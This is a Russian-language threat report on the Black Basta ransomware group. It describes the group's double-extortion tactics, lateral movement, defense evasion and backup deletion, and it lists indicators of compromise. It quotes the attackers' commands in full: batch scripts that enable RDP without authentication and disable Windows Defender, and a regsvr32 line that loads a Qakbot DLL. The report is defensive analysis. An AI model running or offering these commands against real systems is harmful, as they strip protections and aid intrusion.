Black Basta - группа разработчиков вымогательского ПО, появившаяся недавно: первые публичные сообщения об атаках появились в апреле этого года.
Black Basta APT
Боковое перемещение
Как и другие группы вымогателей, Black Basta использует атаки с двойным вымогательством, при которых данные сначала удаляются из сети, а затем запускается программа-вымогатель. Затем злоумышленник угрожает утечкой данных на Tor-сайте "Black Basta Blog" или "Basta News". Black Basta использует два Tor-сайта: один - для утечки украденных данных, а другой - для связи с операторами выкупной программы. Последний сайт указан в записке о выкупе, которая передается исполняемым файлом программы.
Black Basta был замечен за использованием следующих методов для бокового перемещения по сети после получения первоначального доступа:
PsExec.exe, который был создан в папке C:\Windows\.
Qakbot использовался для удаленного создания временной службы на целевом узле, которая была настроена на выполнение DLL Qakbot с помощью regsvr32.exe:
regsvr32.exe -s \\\<IP адрес взломанного контроллера домена>\SYSVOL\<случайная строка>.dll
RDP вместе с развертыванием пакетного файла rdp.bat, который содержал командные строки для включения RDP-логинов. Это использовалось для того, чтобы агент угрозы мог устанавливать сеансы удаленного рабочего стола на взломанных узлах, даже если RDP был изначально отключен:
1 2 3 4 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f net start MpsSvc netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f |
Уклонение от защиты
Во время вторжения угрожающий агент предпринял шаги, чтобы предотвратить вмешательство антивируса. Было замечено, что угрожающий агент использовал две основные техники для отключения Windows Defender.
Первый использовал пакетный сценарий d.bat, который был развернут локально на взломанных узлах и выполнял следующие команды PowerShell:
1 2 3 | powershell -ExecutionPolicy Bypass -command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force" powershell -ExecutionPolicy Bypass -command "Set-MpPreference -DisableRealtimeMonitoring 1" powershell -ExecutionPolicy Bypass Uninstall-WindowsFeature -Name Windows-Defender |
Вторая техника включает создание GPO (объекта групповой политики) на взломанном контроллере домена, который будет вносить следующие изменения в реестр Windows на узлах, подключенных к домену.
Обнаружение
Текстовый файл в папке C:\Windows\ под названием pc_list.txt присутствовал на двух взломанных контроллерах домена, оба содержали список внутренних IP-адресов всех систем в сети. Это было сделано для того, чтобы предоставить агенту угрозы список IP-адресов для установки вымогательского ПО.
Командование и контроль
Qakbot был основным методом, используемым угрожающим субъектом для поддержания своего присутствия в сети. Угрожающий агент также был замечен в использовании маячков Cobalt Strike во время компрометации.
Воздействие
Перед развертыванием программы-выкупа угроза создала RDP-сессии на серверах Hyper-V и оттуда изменила конфигурацию заданий резервного копирования Veeam и удалила резервные копии размещенных виртуальных машин.
На одном из взломанных контроллеров домена была обнаружена закодированная команда PowerShell, при расшифровке которой был получен сценарий Invoke-TotalExec, обеспечивающий возможность распространения и выполнения файлов по сети с помощью WMI (Windows Management Instrumentation). Судя по всему, скрипт был запущен для распространения двоичного файла ransomware по IP-адресам, содержащимся в файле C:\Windows\pc_list.txt. Анализ сценария показывает, что создаются два файла журнала:
C:\Windows\Temp\log.info - Содержит записи журнала для успешных попыток.
C:\Windows\Temp\log.dat - Содержит записи о неудачных попытках.
Файл журнала содержал записи о неудачных загрузках для всех IP-адресов из pc_list.txt, указывая на то, что угрожающий агент пытался развернуть исполняемый файл ransomware на всех хостах сети, однако это не удалось. Несмотря на это, программа-вымогатель все равно была развернута на серверах Hyper-V и контроллерах домена.
Indicators of Compromise
IPv4
23.106.160.188
SHA1
- eb43350337138f2a77593c79cee1439217d02957
- 920fe42b1bd69804080f904f0426ed784a8ebbc2
Filenames
- C:\Windows\PsExec.exe
- C:\Windows\SYSVOL\sysvol\<random string>.dll
- C:\Windows\Temp\log.info C:\Windows\Temp\log.dat